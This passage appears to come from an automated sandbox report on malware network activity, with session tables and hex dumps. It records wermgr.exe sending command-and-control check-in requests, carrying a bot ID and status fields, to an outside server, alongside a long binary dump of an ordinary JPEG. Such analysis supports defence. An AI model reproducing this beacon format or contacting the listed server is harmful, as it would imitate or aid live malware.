2021-10-02 16:13:18 UTC	10	IN	Data Raw: 61 7c 74 73 29 7c 6d 6d 65 66 7c 6d 6f 28 30 31 7c 30 32 7c 62 69 7c 64 65 7c 64 6f 7c 74 28 5c 2d 7c 20 7c 6f 7c 76 29 7c 7a 7a 29 7c 6d 74 28 35 30 7c 70 31 7c 76 20 29 7c 6d 77 62 70 7c 6d 79 77 61 7c 6e 31 30 5b 30 2d 32 5d 7c 6e 32 30 5b 32 2d 33 5d 7c 6e 33 30 28 30 7c 32 29 7c 6e 35 30 28 30 7c 32 7c 35 29 7c 6e 37 28 30 28 30 7c 31 29 7c 31 30 29 7c 6e 65 28 28 63 7c 6d 29 5c 2d 7c 6f 6e 7c 74 66 7c 77 66 7c 77 67 7c 77 74 29 7c 6e 6f 6b 28 36 7c 69 29 7c 6e 7a 70 68 7c 6f 32 69 6d 7c 6f 70 28 74 69 7c 77 76 29 7c 6f 72 61 6e 7c 6f 77 67 31 7c 70 38 30 30 7c 70 61 6e 28 61 7c 64 7c 74 29 7c 70 64 78 67 7c 70 67 28 31 33 7c 5c 2d 28 5b 31 2d 38 5d 7c 63 29 29 7c 70 68 69 6c 7c 70 69 72 65 7c 70 6c 28 61 79 7c 75 63 29 7c 70 6e 5c 2d 32 7c 70 6f 28 Data Ascii: a\|ts)\|mmef\|mo(01\|02\|bi\|de\|do\|t(\-\| \|o\|v)\|zz)\|mt(50\|p1\|v )\|mwbp\|mywa\|n10[0-2]\|n20[2-3]\|n30(0\|2)\|n50(0\|2\|5)\|n7(0(0\|1)\|10)\|ne((c\|m)\-\|on\|tf\|wf\|wg\|wt)\|nok(6\|i)\|nzph\|o2im\|op(ti\|wv)\|oran\|owg1\|p800\|pan(a\|d\|t)\|pdxg\|pg(13\|\-([1-8]\|c))\|phil\|pire\|pl(ay\|uc)\|pn\-2\|po(
2021-10-02 16:13:18 UTC	11	IN	Data Raw: 65 74 75 72 6e 5b 32 5d 7d 7d 29 7d 29 7d 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 28 29 3b 0a Data Ascii: eturn[2]}})})}()}catch(e){}}();

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49878	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:14:12 UTC	246	OUT	GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/23/100019/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: 179.189.229.254
2021-10-02 16:14:13 UTC	246	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Sat, 02 Oct 2021 16:14:13 GMT Content-Length: 9 Connection: close
2021-10-02 16:14:13 UTC	247	IN	Data Raw: 4e 6f 74 20 66 6f 75 6e 64 Data Ascii: Not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49879	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:14:15 UTC	247	OUT	GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/DNSBL/not%20listed/0/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: 179.189.229.254
2021-10-02 16:14:15 UTC	247	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Sat, 02 Oct 2021 16:14:15 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2021-10-02 16:14:15 UTC	247	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49884	179.189.229.254	443	C:\Windows\System32\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:14:19 UTC	247	OUT	GET /soc1/581804_W10017134.2A00BB06611A26D11064433A0EF770C4/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1 Connection: Keep-Alive User-Agent: curl/7.78.0 Host: 179.189.229.254
2021-10-02 16:14:20 UTC	247	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Sat, 02 Oct 2021 16:14:19 GMT Content-Type: text/plain Content-Length: 3 Connection: close
2021-10-02 16:14:20 UTC	247	IN	Data Raw: 2f 31 2f Data Ascii: /1/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49821	87.248.118.23	443	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-02 16:13:23 UTC	11	OUT	GET /lo/api/res/1.2/Ykihn_T97HyKmYp1zmghmg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1632726832621-2072.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Referer: https://www.msn.com/de-ch/?ocid=iehp Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: s.yimg.com Connection: Keep-Alive
2021-10-02 16:13:23 UTC	12	IN	HTTP/1.1 200 OK Content-Length: 132036 Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Origin: * Cache-Control: public, max-age=2592000 Content-Type: image/jpeg Edge-Cache-Tag: 409516005870644511329603528646380041770,415930648339712111872285657998251086336,ae7a14591aaf8d474cdb3f92111c923e Etag: "200ae005b4441172162151894c9d339c" Last-Modified: Mon, 27 Sep 2021 13:35:07 GMT Server: ATS Status: 200 OK Timing-Allow-Origin: * X-Request-Id: 50067f1731747e04174ba2e62533b730 Accept-Ranges: bytes Date: Mon, 27 Sep 2021 13:35:48 GMT X-Served-By: cache-wdc5556-WDC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1632749749.669498,VS0,VE254 Age: 441455 Strict-Transport-Security: max-age=15552000 Referrer-Policy: no-referrer-when-downgrade X-Frame-Options: SAMEORIGIN cld_cache: MISS cld_hits: 0 cld_id: 50067f1731747e04174ba2e62533b730 cld_by: cache-wdc5556-WDC cld_latency: 254 Connection: close Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff
2021-10-02 16:13:23 UTC	13	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 96 00 96 00 00 ff e2 02 28 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 18 00 00 00 00 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 74 72 58 59 5a 00 00 01 64 00 00 00 14 67 58 59 5a 00 00 01 78 00 00 00 14 62 58 59 5a 00 00 01 8c 00 00 00 14 72 54 52 43 00 00 01 a0 00 00 00 28 67 54 52 43 00 00 01 a0 00 00 00 28 62 54 52 43 00 00 01 a0 00 00 00 28 77 Data Ascii: JFIF(ICC_PROFILEmntrRGB XYZ acsp-desctrXYZdgXYZxbXYZrTRC(gTRC(bTRC(w
2021-10-02 16:13:23 UTC	14	IN	Data Raw: 5b fc 61 54 9c 4d bd fe 37 18 21 36 0a 49 36 d9 49 b7 f3 7c 65 4b 04 02 1f 09 20 d7 75 3f 0d df 03 15 30 01 c9 21 87 18 b8 35 11 94 46 95 54 a8 4b 8f 4d a5 40 6d 52 66 d4 67 38 dc 78 31 98 40 0a 71 d9 12 5f 28 69 a6 d0 9b 95 29 c5 a5 20 90 0f 51 8c 4b 5d a2 c9 64 b2 ae 6d be 7a 65 cb 46 25 bb d4 04 ba 89 1c 80 70 2a 77 eb 1d 15 c5 71 5e b7 ed e3 22 e7 ba 24 db 2f 0b d6 7c c4 4b 95 67 b3 49 5c d0 93 31 49 4a 71 04 25 4c 97 23 17 07 7e 1a 85 c4 3e db b9 23 2b c9 7a 95 c3 6c be ac e7 29 8d 4d 9c c3 55 5b f4 ca 0b 8e 24 a9 25 c8 50 db 06 a1 35 ab ea 4a 64 73 a2 34 e0 2a 52 52 46 93 8f 29 bd 3a 4c 91 29 66 4d d8 9f dd ca a3 19 9f 70 32 cf 3a c7 e8 87 46 1f a0 db d2 f6 b1 48 bd 7a 45 bf 55 73 0b 40 1f fb 9e c0 01 b4 4e 71 f4 af ea 32 1f 22 e0 11 be 35 ae b1 db Data Ascii: [aTM7!6I6I\|eK u?0!5FTKM@mRfg8x1@q_(i) QK]dmzeF%pwq^"$/\|KgI\1IJq%L#~>#+zl)MU[$%P5Jds4RRF):L)fMp2:FHzEUs@Nq2"5
2021-10-02 16:13:23 UTC	15	IN	Data Raw: e2 ca 92 03 6a 52 d4 90 1a 6c 85 e0 82 05 d4 c9 53 8d 2f d1 d0 c8 42 5b 49 55 96 4a 94 56 8d 6a 0b 58 1a da 75 25 08 d3 cb 52 6c d8 09 72 48 0a 69 04 11 4e e3 0b fe a9 90 39 a7 98 86 f9 8a 53 87 40 4a d2 a5 34 8d c1 71 31 d4 50 91 1d 1a 1c 6c 6b 22 22 11 eb 92 08 8a 2d 62 a9 49 7d 15 2a 43 ab 33 58 99 16 50 43 3c c4 a5 f5 53 4a 9d 82 f2 1c 69 46 42 24 c3 7b fa d1 8c 77 c1 2a 4a 94 97 9e e5 9b c1 49 58 29 1a fa 6b e5 15 ce b3 c9 b5 20 d9 e7 cb 4c d9 53 7b 0b 42 99 b0 af b2 48 7d 52 09 23 8b 47 d3 df 61 7e da f4 de d4 8c c5 c8 1c 4f 8d 0a 9b c5 18 59 4e a5 52 8b 56 ca 91 6a 06 0f 11 69 99 6b 87 12 a9 35 fa 11 a6 c8 79 f7 18 ce 2d e5 58 b3 2b 6b 8e 2b 94 4a 56 73 9b 91 72 9d 1a 98 c0 aa d2 f9 13 b8 2b e7 67 97 67 9e ab c6 52 4a ba ca 16 0e 4b 8e 1c 0f a6 71 Data Ascii: jRlS/B[IUJVjXu%RlrHiN9S@J4q1Plk""-bI}C3XPC<SJiFB${wJIX)k LS{BH}R#Ga~OYNRVjik5y-X+k+JVsr+ggRJKq
2021-10-02 16:13:23 UTC	17	IN	Data Raw: 58 a8 84 6e 00 ef 3e b2 40 55 fb 81 1e 16 30 2b 77 98 85 42 f0 7c f5 a8 8c 46 41 54 57 c8 64 24 20 15 a9 45 64 6a 69 2a 37 09 4a 89 17 48 51 58 48 3f a0 1b 0b dc e2 ef 9e 10 b3 a6 23 10 a8 f2 f1 cf e7 8b 59 e4 4a 53 a9 52 dd 5a 47 29 6b 2d b4 00 fe a1 70 0b 85 2a fb a4 e9 df ca f6 bd f0 e1 0e 1e 9e 3f 8f 9d d5 c3 54 c1 88 b0 71 bd ff 00 11 8d cb 9a db 8e a5 6a 2a 5c 74 a9 2a 01 02 c9 4a 40 d2 34 f7 8f d2 12 4e d6 d3 7c 5a 84 ab 20 1f 96 bb f4 11 5a 8e 22 f9 46 3f 3d eb b8 02 1c 2e 20 a6 e1 a0 8d 48 49 be a4 85 bb b6 a3 7b 10 76 02 c7 a1 36 39 52 90 a4 82 48 6c 4c dd cf f7 8a 96 a6 1b dd fe 7d a3 1d 9b 21 6a 03 94 bb a5 6a 51 40 b0 fd 08 3c bd dc bf a9 71 73 7e 96 b6 33 e5 ff 00 1e 5e de 51 82 56 1c be 79 fe 04 62 95 09 6d 86 d6 d8 70 29 48 50 50 d3 70 35 Data Ascii: Xn>@U0+wB\|FATWd$ Edji7JHQXH?#YJSRZG)k-p?Tqj\tJ@4N\|Z Z"F?=. HI{v69RHlL}!jjQ@<qs~3^QVybmp)HPPp5
2021-10-02 16:13:23 UTC	18	IN	Data Raw: 1a e9 af 3f f9 85 29 c4 fa c0 87 29 b5 04 ca 86 ad 8d 81 0c 25 49 ea 95 0d ed b5 bb af fb d2 ec 99 ff 00 2d 6c b4 4b 48 66 4a 66 16 a0 e2 fc 39 07 ab c7 9e 6d 8f 43 5d 1c 6d f5 99 68 da dd 99 ba 27 4d 98 ed 6a b1 59 91 67 b5 28 1d 54 a9 58 0e af 50 48 f2 8d cb c8 bd bc 93 2b 93 4e e2 ae 4b 66 4b 6a 01 07 30 65 12 22 4b 4a 88 b7 32 5d 1a 54 85 45 78 5c 5d 66 14 d8 57 27 d4 8f bd b1 e8 d7 4f 49 f3 a5 91 26 f5 92 99 87 2c 72 80 7f 2a 53 5a 65 96 e8 f8 73 a4 6f d0 1d c7 6d 9b 6a bc 7a 3b be e7 58 96 31 19 77 6d e2 f3 ac 6f 56 44 b9 89 0a 5a 8b b0 0b 52 52 37 98 d9 d1 c6 6e 0b cc c9 79 97 88 b0 33 cc 03 97 72 66 5f ab 66 9c cb 12 4a 84 3a f4 0a 4d 0a 12 e7 4f 6d aa 3c de 54 b9 53 9f 6d a1 16 9c cc 60 f2 67 4f 93 1a 2c 55 29 c7 90 71 e9 d7 46 d2 dc f7 ba 07 51 Data Ascii: ?))%I-lKHfJf9mC]mh'MjYg(TXPH+NKfKj0e"KJ2]TEx\]fW'OI&,r*SZesomjz;X1wmoVDZRR7ny3rf_fJ:MOm<TSm`gO,U)qFQ
2021-10-02 16:13:23 UTC	19	IN	Data Raw: cd 39 52 94 14 0a 4b 76 83 12 d4 55 38 28 11 cc 18 b4 ad e5 ba a2 85 21 01 d5 34 93 eb f3 1a 6d fd 4a 2e 94 3a 14 10 b5 29 dd 29 92 b8 ee 21 e5 38 94 29 c6 e3 28 12 ac 5d 18 f1 40 b6 90 d2 96 f9 50 6f 5b 66 32 48 58 e5 a1 c4 b4 bd 3a 5c 42 96 87 9a 50 21 6d a5 a7 39 17 49 28 71 1c b7 12 96 49 62 0f ca c1 bc 68 41 07 88 21 88 ef 8c af 2a 56 b3 1e 5f ab e5 ba 9d 27 30 cc a4 b9 96 6a b4 98 74 58 30 6a 55 8a 74 95 bc e0 aa 48 72 ae 9a 94 05 b5 2e 09 a6 3c fa a4 4b 4c 65 17 52 db 88 28 1c 97 11 7b 8a 13 3d 22 52 99 48 26 89 3f 4d 75 fb f1 f2 d7 5a 6c b6 2b 6d 9a 75 8a f1 b1 a2 db 64 98 95 25 76 79 a9 c4 85 a4 97 c2 46 12 c5 ea 0b 12 15 51 51 1f 4d dd 87 fb 6b 64 ce d1 79 7d 8c 83 c4 cc c7 02 57 1f b2 93 95 68 ca 99 09 a5 b4 ae 34 50 a4 65 e6 29 4e 41 55 40 37 Data Ascii: 9RKvU8(!4mJ.:))!8)(]@Po[f2HX:\BP!m9I(qIbhA!*V_'0jtX0jUtHr.<KLeR({="RH&?MuZl+mud%vyFQQMkdy}Wh4Pe)NAU@7
2021-10-02 16:13:23 UTC	20	IN	Data Raw: 4a ff 00 a2 84 20 d9 23 d7 2a 17 49 e9 62 45 82 89 dc 0b 61 c0 27 2f 99 c6 29 9a 9c 64 61 c8 fc e2 3c 9a 31 89 73 47 28 e9 2d 3b ac 12 a4 2b 4a 94 08 06 c9 55 fa 82 7f de 2e 8f fc db 9c 3a 51 bc 77 6b f3 87 94 63 cc 52 54 72 0e fb b2 6a 46 01 2e 73 81 45 29 2a 49 51 3e aa 12 0a 01 4e d7 d6 4e 91 e0 2c 77 e9 6b 62 d4 20 bd 41 67 ee 6c e8 29 cb 58 a8 e4 79 18 b6 48 75 65 a0 79 89 08 60 8b 92 3d 65 2c dc e9 b2 6e 0f 53 ff 00 89 64 d8 0b 5c f5 cb 46 14 87 a0 ae ee 03 74 62 89 a4 02 ea 2e ef f0 ee f8 d1 65 7a 73 44 2c 7a c2 c9 52 53 a8 a0 d8 a8 02 4f aa a2 56 4d 8d ac 81 ea 9e a7 7b 64 a5 05 40 13 51 90 ae f6 15 d7 77 c7 8a cc c2 b7 a9 20 55 be 36 ef bc 63 b3 a7 a7 42 92 a4 24 14 a4 84 94 10 85 58 0d c2 ec 40 5a 40 16 00 5c 91 d0 5f 6c 6c 24 c8 72 3b 3a 6a ed Data Ascii: J #IbEa'/)da<1sG(-;+JU.:QwkcRTrjF.sE)IQ>NN,wkb Agl)XyHuey`=e,nSd\Ftb.ezsD,zRSOVM{d@Qw U6cB$X@Z@\_ll$r;:j
2021-10-02 16:13:23 UTC	21	IN	Data Raw: cb c6 25 49 42 e6 89 8a 01 4a 03 0b 64 92 19 8b 80 c0 d3 36 83 3a 7f dc 2f dc 3a f7 fb 37 c1 8e 5a 83 4a 18 54 69 88 51 5a 64 79 e7 10 b4 a0 25 21 29 12 c2 69 2c 4b 18 42 38 0c e9 ff 00 96 23 e1 1a 8b da 7f 88 9e 8b 0a 1f 0f a9 12 5c 44 89 25 9a be 64 90 c3 ab 6d 6c c6 6c 93 4a a5 12 83 7d 6e be 94 d4 64 24 a8 59 2d c0 52 93 75 8d 39 36 55 2e cc a0 b9 0b 5c 89 87 b4 a9 92 d6 52 b5 2b 32 a5 10 79 f9 f7 60 5e 56 4b 2d eb 66 5d 92 f1 b2 59 6f 0b 3a d3 81 52 6d 92 25 4f 97 84 d1 b0 29 2d c1 d9 c7 8c 68 b5 51 ba 5e 61 63 d1 6b f4 e6 2a 08 37 49 78 b6 0c e4 85 95 28 bb cf 73 77 6c a3 d1 44 91 b0 48 b0 d3 8e fe e7 db db e2 ec ea e5 4c 9e 6d 32 52 6a b9 e4 ad 61 27 f8 be 21 41 a5 1b 48 f9 5b a4 bf d2 57 46 9b 7d 67 9b 36 55 db 67 b9 6f 02 54 a9 56 9b 28 09 40 58 Data Ascii: %IBJd6:/:7ZJTiQZdy%!)i,KB8#\D%dmllJ}nd$Y-Ru96U.\R+2y`^VK-f]Yo:Rm%O)-hQ^ack*7Ix(swlDHLm2Rja'!AH[WF}g6UgoTV(@X
2021-10-02 16:13:23 UTC	22	IN	Data Raw: f4 2a c4 6a e3 21 d9 1c c2 c1 9b 38 a8 0c 28 a0 4b e6 30 80 0b 3b 83 da 1e 27 99 8f 09 fd d2 ac 49 28 54 c1 6a 48 c6 8b 15 ae 5a 59 d0 b0 e9 5a 57 52 c4 95 04 62 ed 14 00 0b 56 3c d3 32 c6 88 e1 7a 51 4b 2f 22 32 e3 b1 0a 14 a6 a9 ec a2 1b f1 99 6e 1a 69 ef 49 73 d2 68 eb 6e 45 41 ea 8e 5f aa d7 23 bb 0a 4d 5e 34 ea 75 55 b8 8d 33 f9 a3 35 1c 8c 69 42 08 98 ca 53 61 40 21 d2 06 58 ab ab eb 93 0d cf 1a d5 4c 9d 8a 5a ec d2 a5 59 e6 4d 01 16 8b 42 89 00 29 63 12 b1 a4 3e 6a 76 ad 14 09 50 dd c6 4f c4 a7 b3 0d 47 3f c0 5f 68 2c a1 22 a5 57 cc d9 6e 05 1b 2e e6 cc a1 1e 85 24 3b 2f 2c c7 91 5a 54 4c e5 02 5c 79 72 dd 9f 26 13 8e b7 4a cc 4d a2 14 78 d1 9e 8f 21 e5 c9 12 d1 25 85 f4 3b 3d 7b 22 43 59 27 2d a5 aa b2 c9 3d a4 ad f2 72 68 92 28 43 35 04 7d 71 fa Data Ascii: *j!8(K0;'I(TjHZYZWRbV<2zQK/"2niIshnEA_#M^4uU35iBSa@!XLZYMB)c>jvPOG?_h,"Wn.$;/,ZTL\yr&JMx!%;={"CY'-=rh(C5}q
2021-10-02 16:13:23 UTC	24	IN	Data Raw: c1 86 6f 41 f1 cc 10 ae 3c 71 41 67 2d 94 48 2c 5e 23 5a 12 7d 63 d7 bb 7e f1 d3 11 01 51 39 c4 76 3e 18 22 21 60 8b 25 eb dd 14 e3 70 0f 8e 08 a5 40 90 40 2c 4b 57 3d 60 35 26 fb 8d ef d7 6f 65 fc b1 62 14 07 64 a5 dd c7 79 d5 a2 52 30 86 cf 3f 3f cd 60 ee 0f 43 7c 32 b0 a7 20 0f 73 7b 44 c2 c2 04 38 05 fc bf 30 42 c3 86 48 67 14 ee 82 16 26 86 a1 b7 3c 10 16 d1 a8 9d f5 1f 0e 9b 7b 70 8b c8 1f 95 fe a0 81 20 a8 95 77 7b bb 87 b7 cb 12 8c bb fd 84 10 09 f5 94 53 e1 6d fd d7 c3 c1 0b 7b 90 45 ad f3 c1 04 3a 2c 2e 0f 99 03 c4 5f 55 fc bb be 38 55 0c 41 b2 82 29 d5 d4 fb 70 04 b2 48 7f 28 21 b0 a1 d0 5b 37 ee cb c7 7c 10 b1 72 c0 52 12 fd dd df d4 10 8d 85 ba dc f9 1b 7c 7e fe 58 c5 33 15 2f 47 67 f1 1f 29 04 2c 1d 61 99 52 1b e7 cf 99 90 b0 24 62 a2 86 fe Data Ascii: oA<qAg-H,^#Z}c~Q9v>"!`%p@@,KW=`5&oebdyR0??`C\|2 s{D80BHg&<{p w{Sm{E:,._U8UA)pH(![7\|rR\|~X3/Gg),aR$b
2021-10-02 16:13:23 UTC	25	IN	Data Raw: f1 68 fd 63 ff 00 d3 e2 ea 97 d7 6d 0d e2 52 4a 6c 96 5b 3c b4 1c 2d 89 76 a2 be b2 a7 20 d2 52 c0 6e 7c a3 30 7e 14 5c c3 48 a9 65 59 e5 0e 47 aa 34 a7 22 f3 8a f4 31 35 00 32 95 b6 35 84 25 06 e0 2d 36 d6 1b d9 2e 58 5c f1 fd 1f 5f c6 ea bc 93 67 9e a2 6c d3 88 01 2f 84 75 8a 01 df 4c 80 7a 0f 48 fa 3b f5 79 d1 04 9d bd d8 a9 97 cd 82 cd d7 5f b7 0a 0c e9 18 51 89 73 ac 25 09 55 a2 49 62 2a 96 52 92 aa 80 5c 35 63 9b 39 d7 2e 3f 41 ae 4c a5 cd 4a 95 c9 75 7c a5 36 15 ad 6c 29 b5 a9 0c df a3 a8 0b 4b 7a 02 52 40 e5 6b 79 87 52 5b c7 d4 32 16 8e a6 5a 82 81 0b ed 04 bf d2 14 01 d2 87 3c a8 78 47 e1 15 ef 75 cf bb 2d b6 a9 13 dd 04 4c 54 c0 95 27 0a b0 be 04 b8 25 d2 c1 38 58 d5 c1 3c b0 d0 96 9b 5b b1 f5 68 75 7a 9d 20 21 6a fe a3 00 ba da 56 f1 d2 a4 36 Data Ascii: hcmRJl[<-v Rn\|0~\HeYG4"1525%-6.X\_gl/uLzH;y_Qs%UIb*R\5c9.?ALJu\|6l)KzR@kyR[2Z<xGu-LT'%8X<[huz !jV6
2021-10-02 16:13:23 UTC	26	IN	Data Raw: 68 c0 12 d4 cb 12 a4 c8 8f 49 ac 53 e4 a9 84 fa 13 95 ea 94 d8 f3 1d ab 3d 50 7d 80 d8 93 3d d6 e4 c5 a9 c7 91 54 89 1e bb 46 6e 14 86 ab 2b 94 9a 7b 6e 48 79 32 02 6d 12 e6 bb 89 6a c7 87 22 48 e3 51 de de 54 8a 0c eb 51 b7 59 6d 56 29 b2 55 68 91 6d b2 db 94 a9 8a 27 f6 e9 b2 2d 33 4c b9 3d a0 44 a4 a1 2a c6 ca 00 a4 b3 02 c6 3e 69 3b 60 f6 63 9f d9 93 3d 52 ea 99 5e 75 62 a1 90 73 0f 2e 66 4f cc b3 24 c4 7a a8 9a bc 06 a3 aa b1 0a 62 e9 28 65 88 92 23 cc 2a 9b 4c d2 90 89 54 a7 a2 b8 87 64 bd 1e 61 63 d1 ee ab 6c bb ce 44 e9 13 90 0a 70 14 2a 49 a9 52 4b 39 ad 1c 39 26 9c b7 c7 ea 0f 41 1d 30 c9 e9 1e e7 99 6b 96 99 16 4d a5 b9 54 2c d6 fb 15 95 4a 01 12 e5 94 89 16 99 64 95 29 52 a6 a5 38 4c ca b2 c8 49 24 a8 3f 64 ff 00 0f 5e d5 6b e3 0e 43 4e 58 ae Data Ascii: hIS=P}=TFn+{nHy2mj"HQTQYmV)Uhm'-3L=D>i;`c=R^ubs.fO$zb(e#LTdaclDp*IRK99&A0kMT,Jd)R8LI$?d^kCNX
2021-10-02 16:13:23 UTC	27	IN	Data Raw: 4a 81 00 6f fc 77 5b c7 cc 60 5e 42 08 70 54 09 45 bd 50 0e fb 78 12 3c fe 78 94 65 df ec 20 81 47 fe 21 f7 7f f8 9c 31 c8 f2 30 42 d4 54 49 22 dd 3b 88 be 2a 4a 88 cf c3 76 ef 99 41 0b fc 7b bc 30 c5 74 a3 f3 82 20 37 07 7e b8 99 6f 86 b9 92 60 86 c3 e8 4e ef 9e d0 42 c5 7d 72 49 c3 da a5 59 8f 1e ea f9 c1 0a f7 1d 76 f9 62 56 90 50 56 d4 a3 9f 0d 20 85 8a 02 92 32 f4 3f 68 21 63 3d 29 46 83 e7 11 94 10 b0 4c 20 24 bf 08 21 0d ce 91 d6 d7 Data Ascii: Jow[`^BpTEPx<xe G!10BTI";*JvA{0t 7~o`NB}rIYvbVPV 2?h!c=)FL $!
2021-10-02 16:13:23 UTC	27	IN	Data Raw: fd fb fa 77 63 0e 64 d0 53 85 2f 89 f7 79 78 83 a1 82 0b 4a 80 3f 5e bf e3 0f 28 1c 35 cd db 8c 10 04 84 da e7 af bf 08 a9 89 24 24 3b e7 96 ef 94 82 1c 1b ee 31 91 2e 56 20 46 a6 95 20 54 e8 fb bb ff 00 04 2c 22 c8 96 59 54 e4 20 f9 9b 7a c3 0b dc f8 6d 6f e7 12 66 20 a4 36 74 d3 84 10 f8 a5 53 00 25 8b 3f 0e 1f 32 82 16 20 8c 21 ce 46 b0 40 93 7b 81 d6 c7 6c 48 05 59 57 cb d6 08 be d0 5b 69 f7 1f 80 f2 52 a6 2a 0c 3d 11 e4 a8 5d 2a 6d f6 96 c3 a9 57 76 95 25 c2 0f bf ae 30 ad c9 13 6c b6 89 00 62 54 d9 4b 96 90 d9 ad 69 29 4f 73 90 e7 74 74 7b 29 78 aa eb bf ee 7b 72 09 0a b2 5e 36 4b 43 81 50 99 33 93 31 44 6f 21 29 27 8e 42 b1 c0 2c c5 4d 76 8b 98 ab f4 59 28 e5 48 a5 d6 aa 94 f7 90 41 4f af 0a 6b d1 8f aa a3 a9 37 e5 ec 93 d0 5a c0 0b 0c 7c 99 69 96 Data Ascii: wcdS/yxJ?^(5$$;1.V F T,"YT zmof 6tS%?2 !F@{lHYW[iR=]mWv%0lbTKi)Ostt{)x{r^6KCP31Do!)'B,MvY(HAOk7Z\|i
2021-10-02 16:13:23 UTC	28	IN	Data Raw: ca 68 cc 73 4f 2c af 42 93 4f 69 c0 d3 52 24 ae 3b 25 4d ae 7c 96 62 85 bb 0f d1 da 11 cb 28 75 17 49 3e af a9 82 f4 d4 33 f3 8f 84 14 30 af 03 1e c8 aa 8a 4b 55 ff 00 96 4f 46 20 69 58 b2 ae 4b f3 96 db 2d 29 69 52 5b 72 44 99 2d c6 8e 99 6d b2 ca 59 fe b4 64 ea 6a 3c 38 37 02 5a 50 1d e7 d9 3a c7 38 80 ca a4 96 0f 13 15 70 a9 f5 9a 8c e1 50 a5 33 35 b9 6e 09 8e 36 ed 39 a7 25 48 75 1c 99 08 9a 69 91 dc 43 92 26 a1 a0 5f 5b 8e b3 14 c5 87 09 e5 3d 66 c3 0d 28 49 99 26 46 15 4d 5a 40 5b 31 7d e2 80 ee 7a f3 c8 45 33 2d 12 64 cb 4c d9 b3 13 2d 0a 99 d5 85 2d 41 23 19 c8 17 3a e9 be 3d 0f 2f 4b fc ce 23 b1 a1 b8 5b a6 c6 6a 95 1a 8f 4c 3f 97 95 95 47 8a eb 4a 9f 2a 5a 61 30 d7 a5 cc 91 2d f8 f1 8b ea 49 93 0d a7 61 ce 4a 95 eb 63 36 5a 92 b2 c9 2f 41 bd 99 Data Ascii: hsO,BOiR$;%M\|b(uI>30KUOF iXK-)iR[rD-mYdj<87ZP:8pP35n69%HuiC&_[=f(I&FMZ@[1}zE3-dL--A#:=/K#[jL?GJ*Za0-IaJc6Z/A
2021-10-02 16:13:23 UTC	30	IN	Data Raw: 7d df 39 3c 60 ce b4 af 12 92 1e 94 ae f0 dd d5 76 f1 e3 17 1c 83 c3 fc f9 c6 5c e9 40 e1 ef 0e e8 13 b3 26 67 af 4a 4c 6a 7d 36 12 02 8a 46 b4 7a 4c e9 ee ad 05 ba 7d 2a 9e c9 f4 9a 95 4a 49 4c 68 51 c0 5b 8a 1a 9b 4a f7 f7 65 81 56 cb 42 11 29 18 85 01 2a ec 87 7a d6 b5 f9 52 63 47 79 de 68 b0 48 5d a6 7a c2 12 43 00 2a b7 02 bd 90 5d b2 6d ef 48 fa c4 ec 75 d8 f3 23 f6 4c c8 df 97 42 30 eb dc 4d cc 11 58 5e 7e cf 8d 21 4a 54 c7 ca 51 af 2e d0 55 21 b0 f4 3c ab 4d 79 bb 32 d3 65 b7 ab 2f 36 6a 15 03 cd 5b 28 6b d7 2e eb be 45 82 50 09 40 eb 94 01 5d 28 19 f0 b1 d5 dc 96 d2 3c 1e fa be ad 17 95 a1 6a 2a 51 b3 e2 56 0a 90 ef 42 0a 74 3e 9c 23 70 8f 7d bb ef bf 4f 1d f6 f6 df 19 ea 72 71 0f ab ca 34 41 43 09 42 50 03 d5 f5 71 5c e0 0e ed 93 de 12 77 f3 b7 Data Ascii: }9<`v\@&gJLj}6FzL}JILhQ[JeVB)zRcGyhH]zC]mHu#LB0MX^~!JTQ.U!<My2e/6j[(k.EP@](<jQVBt>#p}Orq4ACBPq\w
